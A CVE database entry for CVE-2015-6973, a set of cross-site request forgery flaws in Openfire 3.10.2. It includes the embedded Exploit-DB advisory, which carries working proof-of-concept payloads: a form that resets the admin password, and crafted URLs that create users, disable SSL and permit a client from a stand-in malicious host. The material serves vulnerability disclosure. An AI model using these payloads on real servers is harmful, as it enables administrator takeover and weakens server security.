CVE-2015-6973 : Detail

CVE-2015-6973

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
14.04%V4
Network
2015-09-16
17h00 +00:00
2018-10-09
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple cross-site request forgery (CSRF) vulnerabilities in Ignite Realtime Openfire 3.10.2 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via a crafted request to user-password.jsp, (2) add users via a crafted request to user-create.jsp, (3) edit server settings or (4) disable SSL on the server via a crafted request to server-props.jsp, or (5) add clients via a crafted request to plugins/clientcontrol/permitted-clients.jsp.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 38192

Publication date : 2015-09-14 22h00 +00:00
Author : hyp3rlinx
EDB Verified : No

[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-CSRF.txt Vendor: ================================ www.igniterealtime.org/projects/openfire www.igniterealtime.org/downloads/index.jsp Product: ================================ Openfire 3.10.2 Openfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Vulnerability Type: ================================= Cross site request forgery (CSRF) CVE Reference: ============== N/A Vulnerability Details: ===================== No CSRF tokens exists allowing us to take malicious actions against the application. 1- change admin password. 2- add aribitrary users to the system 3- edit server settings e.g. turn off SSL. 4- Add rogue malicious clients with permit access (Allow all XMPP clients to connect) and more... Exploit code(s): =============== 1) change admin password <script> function doit(){ var e=document.getElementById('HELL') e.submit() } </script> <form id="HELL" action="http://localhost:9090/user-password.jsp" method="post"> <input type="text" name="username" value="admin" > <input type="text" name="password" value="abc123"> <input type="text" name="passwordConfirm" value="abc123" > <input type="password" name="update" value="Update+Password" > </form> 2) add aribitrary users http://localhost:9090/user-create.jsp?username=hyp3rlinx&name=hyp3rlinx&email=blasphemer@abyss.com&password=abc123&passwordConfirm=abc123&create=Create+User 3) edit server settings & turn off SSL http://localhost:9090/server-props.jsp?serverName=myserver&sslEnabled=false&save=Save+Properties 4) add rogue malicious clients http://localhost:9090/plugins/clientcontrol/permitted-clients.jsp?all=false&other=http%3A//maliciouso.com/666.exe&addOther=Add Disclosure Timeline: ========================================================= Vendor Notification: NA Sept 14, 2015 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] POST & GET Vulnerable Product: [+] Openfire 3.10.2 Vulnerable Parameter(s): [+] update, create, sslEnabled, other Affected Area(s): [+] Admin =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

Products Mentioned

Configuraton 0

Igniterealtime>>Openfire >> Version 3.10.2

References

https://security.gentoo.org/glsa/201612-50
Tags : vendor-advisory, x_refsource_GENTOO
https://www.exploit-db.com/exploits/38192/
Tags : exploit, x_refsource_EXPLOIT-DB